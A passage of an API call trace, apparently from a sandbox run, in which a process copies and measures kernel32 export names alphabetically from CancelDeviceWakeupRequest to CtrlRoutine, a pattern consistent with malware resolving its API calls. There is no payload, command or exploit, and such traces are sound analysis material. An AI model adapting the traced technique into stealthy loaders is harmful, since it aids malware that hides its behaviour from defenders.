[0083.631] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.632] lstrlenA (lpString="CANCELIO") returned 8 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.632] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.632] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.632] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.632] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.632] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.632] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.632] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.632] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.632] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.632] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.632] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.632] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.632] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.632] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.632] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.632] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.632] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.632] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.633] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.633] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.633] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.633] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.633] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.633] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.633] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.633] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.633] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.633] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.633] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.633] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.633] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.633] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.634] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.634] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.634] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.634] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.634] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.634] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.634] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.634] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.634] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.634] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.634] lstrlenA (lpString="COPYFILEA") returned 9 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.634] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.634] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.634] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.634] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.634] lstrlenA (lpString="COPYFILEW") returned 9 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.634] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.634] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.634] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.635] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.635] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.635] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.635] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.635] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.635] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.635] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.635] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.635] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.635] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.635] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.635] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.635] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.635] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.635] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.635] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.635] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.635] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.635] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.636] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.636] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.636] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.636] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.636] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.636] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.636] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.636] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.636] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.636] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.636] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.636] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.636] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.636] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.636] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.636] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.636] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.636] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.636] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.637] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.637] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.637] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.637] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.637] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.637] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.637] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.637] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.637] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.637] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.637] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.637] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.637] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.637] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.637] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.637] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.637] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.637] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.637] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.638] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.638] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.638] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.638] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.638] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.638] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.638] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.638] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.638] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.638] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.638] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.638] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.638] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.638] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.638] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.638] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.638] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.638] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.638] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.639] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.639] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.639] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: 